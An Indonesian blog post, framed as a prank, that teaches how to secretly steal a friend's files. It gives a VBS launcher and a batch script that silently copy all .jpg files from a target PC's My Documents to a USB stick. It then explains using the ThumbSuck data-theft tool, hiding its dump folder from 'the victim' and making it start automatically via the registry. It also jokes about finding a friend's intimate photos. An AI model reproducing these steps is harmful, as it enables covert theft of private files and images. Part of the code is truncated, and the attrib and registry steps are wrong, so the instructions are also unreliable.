Cara Meng-Copy Semua Data Isi Flashdisk Teman Secara Diam-Diam

      Anda termasuk orang suka membuat Troll? Oke disini kita akan membuat sesuai judul yaitu Cara Meng-Copy Semua Data Isi Flashdisk Teman Secara Diam-Diam. Anda pasti ingin tau isi file flashdisk teman anda? Penasaran apa isinya? jangan-jangan teman anda menyimpan foto seksinya lagi mandi? Haha~. Anda ingin memintanya? Mending Jangan deh, dari pada anda di marahin atau di maki-maki olehnya pemilik Flashdisk itu.

Mungkin biasanya anda meng-copy secara diam-diam pas dia lagi tidak ada, Jujur saja? Iyakan hehe. Cara ini cukup beresiko karena apabila anda ketahuan meng-copy atau mencuri isi flashdisk teman anda sendiri bisa-bisa anda di gebukin pake golok, hehe. Dari pada anda akan malu sendiri, mending saya kasih tau tips nya. Untuk memuaskan rasa keingin tahuan anda, saya kasih solusinya ikuti langkah-langkah berikut ini.

Cara Pertama :

1. Buka Notepad, buat file .vbs Copy & Paste kode berikut ini :

dim wshshell, dos
set wshshell = wscript.createobject("wscript.shell")
dos = wshshell.expandenvironmentstrings("%coms…wshshell.run (dos & " /c tarik.bat"), vbhide

Keterangan : Tulisan merah bisa anda ganti, Misalnya Auto Copy.bat
2. Simpan dan File berikan nama (Star.vbs) save as type all files.
3. Buka Notepad lagi, Buat File .bat Copy & Paste kode berikut ini, dan pastekan di Notepad.

@echo off
 mkdir %computername%
xcopy "C:\Documents and Settings\%username%\My Documents\*.jpg" %computername% /s/c/q/r
@cls
@exit

4. Simpan dan File beri nama [ tarik.bat ] karena susaikan dengan script vbs pertama yaitu
(dos & " /c tarik.bat"). Atau anda bisa mengubah nama pada script vbs pertama misalnya :
(dos & " /c nyolong.bat") jadi untuk script bat nya anda perlu namakan "nyolong.bat" saya rasa kalian sudah paham.

Terakhir, silakan Anda Simpan kedua File itu didalam Flashdisk, untuk jalankan atau meng-copy file isi temen secara diam-diam anda hanya perlu menjalankan Star.vbs yaitu script pertama (Klik 2x)

Catatan :

Fungsi file vbs (start.vbs) berfungsi untuk menjalankan file bat (tarik.bat) secara diam-diam atau istilahnya background proses. Sedangkan file bat (tarik.bat) berfungsi untuk menjalankan perintah copy semua file dengan ektensi tertentu yang ada dikomputer target.

Trik diatas tersebut adalah copy semua file yang berektensi jpg (file gambar) yang ada di folder MyDocuments di komputer target (lihat baris ketiga script file bat) C:\Documents and Settings\%username%\My Documents\*.jpg" % Dan disimpan kedalam flash disk ke dalam folder dengan nama sesuai nama komputer target. Anda bisa mengedit sendiri kedua file tersebut diatas sesuai keperluan format file dan folder target yang akan di copy.

 Cara kedua : Dengan Aplikasi ThumbSuck 

Thumbsuck merupakan software komputer yang di rancang sebagai aplikasi pencuri data dari removable media sehingga tanpa sadar korban anda telah kehilangan data yang mungkin penting bagi korban.

Download Thumbsuck [ Google Drive ] - Direct Link

Setelah anda mendownload Thumbsuck ke dalam suatu directory. Misalnya anda meletakkan di Local Drive D:\ dalam folder Hacked. Sehingga menjadi seperti ini :  D:\Hacked . Sebelumnya anda Extrack dulu, karena file ada di WinRar. Kemudian klik 2x file Thumbsuck.exe.

Otomatis, bila anda sedang menancapkan Flahdisk anda dikomputer sendiri, akan muncul folder dengan nama Drive anda sendiri. Contohnya : MayCyberDownload!-Dump. Buatlah folder tersebut menjadi Super Hidden dengan menggunakan atribut SUPER HIDDEN pada Command Prompt (CMD) agar korban tidak curiga. Caranya?

Buka CMD : 

  • Klik Start > Ketik CMD > Jalankan
  • Tekan Tombol Windows + R : Lalu ketik CMD
  • Masuk ke Local D Anda harus mengetik pada Command Prompt " D: " Hilangkan tanda petik.
  • Ketik "attrib -s -h Hacked" Kemudian Enter. 
Bila berhasil, maka Anda bisa membuka folder Hacked tadi dan semua data yang telah disalin oleh Thumbsuck.exe. Untuk mendisable ThumbSuck.exe, anda bisa menggunakan Windows Task Manager CRT+ALT+DEL. 
 
ThumbSUCK.exe tadi bisa dijalankan secara otomatis pada saat komputer dinyalakan (StartUp)
Caranya : 
  • Klik Start > Kemudian ketik Run > ketik "regedit".
  • Klik HKEY_LOCAL_MACHINE >> SOFTWARE >> Microsoft >>Windows >>CurrentVersion
  • Klik kanan pilih New String Value. 
  • Ketik Hacked sebagai key baru.
  • Klik kanan key yang baru dibuat, Modify isi Value sama dengan lokasi Thumbsuck.exe. Saya menaruhnya di local F sesuai gambar dibawah ini, jadi : F:\Hacked\Thumbsuck.exe
  • Silakan Restar Komputer anda, Maka Thumbsuck ini akan berjalan Otomatis 

Sekian Tips Komputer dari saya, Semoga Bermanfaat! . Blog ini tidak pernah mengajarkan kepada anda untuk kejahatan, Tips Ini hanya sekedar media shareing ilmu saja.

Thanks for reading & sharing and visited Cara Meng-Copy Semua Data Isi Flashdisk Teman Secara Diam-Diam.

Related Post

0 Response to "Cara Meng-Copy Semua Data Isi Flashdisk Teman Secara Diam-Diam"

Post a Comment